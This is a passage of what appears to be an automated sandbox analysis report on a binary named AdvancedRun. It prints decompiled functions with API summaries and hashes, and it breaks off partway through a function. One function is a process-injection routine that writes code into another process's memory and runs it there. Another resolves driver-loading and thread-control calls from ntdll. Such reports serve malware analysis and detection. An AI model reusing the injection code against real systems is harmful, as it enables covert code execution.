                                                                  • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 70%
                                                                  			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                  0x0040a474
                                                                  0x0040a47b
                                                                  0x0040a48a
                                                                  0x0040a48d
                                                                  0x0040a48f
                                                                  0x0040a497
                                                                  0x0040a49a
                                                                  0x0040a6f7
                                                                  0x0040a6f9
                                                                  0x0040a700
                                                                  0x0040a700
                                                                  0x0040a4ad
                                                                  0x0040a4b3
                                                                  0x0040a4b8
                                                                  0x0040a4c6
                                                                  0x0040a4cc
                                                                  0x0040a4cf
                                                                  0x0040a4dd
                                                                  0x0040a4e2
                                                                  0x0040a4e3
                                                                  0x0040a4ea
                                                                  0x0040a4e5
                                                                  0x0040a4e5
                                                                  0x0040a4e5
                                                                  0x0040a4ec
                                                                  0x0040a4f6
                                                                  0x0040a4fe
                                                                  0x0040a503
                                                                  0x0040a504
                                                                  0x0040a50b
                                                                  0x0040a506
                                                                  0x0040a506
                                                                  0x0040a506
                                                                  0x0040a50d
                                                                  0x0040a512
                                                                  0x0040a518
                                                                  0x0040a51c
                                                                  0x0040a523
                                                                  0x0040a523
                                                                  0x0040a523
                                                                  0x0040a528
                                                                  0x0040a537
                                                                  0x0040a54c
                                                                  0x0040a539
                                                                  0x0040a544
                                                                  0x0040a549
                                                                  0x0040a558
                                                                  0x0040a56d
                                                                  0x0040a55a
                                                                  0x0040a565
                                                                  0x0040a56a
                                                                  0x0040a579
                                                                  0x0040a591
                                                                  0x0040a57b
                                                                  0x0040a589
                                                                  0x0040a58e
                                                                  0x0040a5b4
                                                                  0x0040a5b7
                                                                  0x0040a5cc
                                                                  0x0040a5cf
                                                                  0x0040a5d4
                                                                  0x0040a5d7
                                                                  0x0040a6ed
                                                                  0x0040a5e5
                                                                  0x0040a5fa
                                                                  0x0040a60b
                                                                  0x0040a61a
                                                                  0x0040a620
                                                                  0x0040a623
                                                                  0x0040a62b
                                                                  0x0040a62f
                                                                  0x0040a632
                                                                  0x0040a659
                                                                  0x0040a634
                                                                  0x0040a635
                                                                  0x0040a641
                                                                  0x0040a648
                                                                  0x0040a648
                                                                  0x0040a668
                                                                  0x0040a66e
                                                                  0x0040a685
                                                                  0x0040a69e
                                                                  0x0040a6a8
                                                                  0x0040a6ad
                                                                  0x0040a6bd
                                                                  0x0040a6c5
                                                                  0x0040a6c8
                                                                  0x0040a6d0
                                                                  0x0040a6d1
                                                                  0x0040a6d2
                                                                  0x0040a6d3
                                                                  0x0040a6d3
                                                                  0x0040a6c8
                                                                  0x0040a6d7
                                                                  0x0040a6dc
                                                                  0x0040a6dc
                                                                  0x0040a6d7
                                                                  0x00000000

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                  • memset.MSVCRT ref: 0040A4B3
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                  • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                  • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                  • memset.MSVCRT ref: 0040A66E
                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                  • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                  • GetLastError.KERNEL32 ref: 0040A6E4
                                                                  • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                  • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                  • API String ID: 1572607441-20550370
                                                                  • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                  • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                  • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                  • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 85%
                                                                  			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                  0x00401093
                                                                  0x00401096
                                                                  0x00401097
                                                                  0x0040109b
                                                                  0x004010a3
                                                                  0x004010a5
                                                                  0x00401270
                                                                  0x00401278
                                                                  0x004012b3
                                                                  0x0040127a
                                                                  0x00401293
                                                                  0x004012a2
                                                                  0x004012a2
                                                                  0x004012c1
                                                                  0x004012d9
                                                                  0x004012ea
                                                                  0x004012ec
                                                                  0x004012f6
                                                                  0x00000000
                                                                  0x004010ab
                                                                  0x004010ab
                                                                  0x004010ac
                                                                  0x00401231
                                                                  0x00401236
                                                                  0x00401239
                                                                  0x0040123d
                                                                  0x00401249
                                                                  0x00401249
                                                                  0x0040124c
                                                                  0x00000000
                                                                  0x00401252
                                                                  0x00401259
                                                                  0x00401265
                                                                  0x00000000
                                                                  0x00401265
                                                                  0x0040123f
                                                                  0x0040123f
                                                                  0x00401243
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401243
                                                                  0x004010b2
                                                                  0x004010b2
                                                                  0x004010b5
                                                                  0x004011e1
                                                                  0x004011e3
                                                                  0x004011e6
                                                                  0x0040120e
                                                                  0x00401216
                                                                  0x00000000
                                                                  0x0040121c
                                                                  0x00401224
                                                                  0x00401226
                                                                  0x00401229
                                                                  0x00000000
                                                                  0x0040122f
                                                                  0x00000000
                                                                  0x0040122f
                                                                  0x00401229
                                                                  0x004011e8
                                                                  0x004011e8
                                                                  0x004011ed
                                                                  0x004011fb
                                                                  0x00401203
                                                                  0x00401203
                                                                  0x004010bb
                                                                  0x004010bb
                                                                  0x004010c0
                                                                  0x00401151
                                                                  0x0040115a
                                                                  0x00401168
                                                                  0x0040116b
                                                                  0x0040116e
                                                                  0x00401170
                                                                  0x00401173
                                                                  0x00401180
                                                                  0x00401182
                                                                  0x00401185
                                                                  0x004011a4
                                                                  0x004011ac
                                                                  0x00000000
                                                                  0x004011b2
                                                                  0x004011ba
                                                                  0x004011bc
                                                                  0x004011c7
                                                                  0x004011c9
                                                                  0x004011cb
                                                                  0x00000000
                                                                  0x004011d1
                                                                  0x00000000
                                                                  0x004011d1
                                                                  0x004011cb
                                                                  0x00401187
                                                                  0x00401187
                                                                  0x00401199
                                                                  0x00000000
                                                                  0x00401199
                                                                  0x004010c6
                                                                  0x004010c8
                                                                  0x004012fd
                                                                  0x004012fd
                                                                  0x004012fd
                                                                  0x004010ce
                                                                  0x004010ce
                                                                  0x004010d7
                                                                  0x004010e5
                                                                  0x004010e8
                                                                  0x004010eb
                                                                  0x004010ed
                                                                  0x004010f0
                                                                  0x00401102
                                                                  0x0040111d
                                                                  0x00401125
                                                                  0x00000000
                                                                  0x0040112b
                                                                  0x00401133
                                                                  0x00401135
                                                                  0x00401140
                                                                  0x00401142
                                                                  0x00401144
                                                                  0x00000000
                                                                  0x0040114a
                                                                  0x0040114a
                                                                  0x00000000
                                                                  0x0040114a
                                                                  0x00401144
                                                                  0x00401104
                                                                  0x0040110a
                                                                  0x0040110b
                                                                  0x0040110b
                                                                  0x0040110e
                                                                  0x00401115
                                                                  0x00401117
                                                                  0x00401117
                                                                  0x00401102
                                                                  0x004010c8
                                                                  0x004010c0
                                                                  0x004010b5
                                                                  0x004010ac
                                                                  0x00401303

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                  • String ID: AdvancedRun
                                                                  • API String ID: 829165378-481304740
                                                                  • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                  • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                  • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                  • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                  0x00408e38
                                                                  0x00408e44
                                                                  0x00408e56
                                                                  0x00408e68
                                                                  0x00408e7a
                                                                  0x00408e8c
                                                                  0x00408e9e
                                                                  0x00408eb0
                                                                  0x00408ec2
                                                                  0x00408ed4
                                                                  0x00408ee6
                                                                  0x00408ef8
                                                                  0x00408f0a
                                                                  0x00408f1c
                                                                  0x00408f21
                                                                  0x00408f23
                                                                  0x00000000
                                                                  0x00408f28
                                                                  0x00408f29

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                  • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                  • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                  • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                  • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                  • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                  • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                  • API String ID: 667068680-4280973841
                                                                  • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                  • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                  • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                  • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 45%
                                                                  			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                  0x00408ae3
                                                                  0x00408aeb
                                                                  0x00408af3
                                                                  0x00408b76
                                                                  0x00408b8a
                                                                  0x00408b91
                                                                  0x00408b98
                                                                  0x00408bb1
                                                                  0x00408bb3
                                                                  0x00408bc6
                                                                  0x00408bcc
                                                                  0x00408bda
                                                                  0x00408be0
                                                                  0x00408bf3
                                                                  0x00408bfa
                                                                  0x00408c0b
                                                                  0x00408c12
                                                                  0x00408c17
                                                                  0x00408c1a
                                                                  0x00408c2c
                                                                  0x00408c39
                                                                  0x00408c3d
                                                                  0x00408c3f
                                                                  0x00408c41
                                                                  0x00408c52
                                                                  0x00408c58
                                                                  0x00408c58
                                                                  0x00408c6f
                                                                  0x00408c71
                                                                  0x00408c73
                                                                  0x00408c83
                                                                  0x00408c89
                                                                  0x00408c89
                                                                  0x00408c8a
                                                                  0x00408c8f
                                                                  0x00408c91
                                                                  0x00408c9a
                                                                  0x00408c93
                                                                  0x00408c93
                                                                  0x00408c93
                                                                  0x00408c9f
                                                                  0x00408ca5
                                                                  0x00408caf
                                                                  0x00408cbc
                                                                  0x00408cc2
                                                                  0x00408cc7
                                                                  0x00408ccd
                                                                  0x00408cd0
                                                                  0x00408cd6
                                                                  0x00408cd7
                                                                  0x00408cd8
                                                                  0x00408cde
                                                                  0x00408ce3
                                                                  0x00408ceb
                                                                  0x00408cfe
                                                                  0x00408d03
                                                                  0x00408d06
                                                                  0x00408d0c
                                                                  0x00408d21
                                                                  0x00408d27
                                                                  0x00408d0c
                                                                  0x00000000
                                                                  0x00408ca7
                                                                  0x00408ca7
                                                                  0x00408cad
                                                                  0x00408d28
                                                                  0x00408d2e
                                                                  0x00408d35
                                                                  0x00408d36
                                                                  0x00408d42
                                                                  0x00408d48
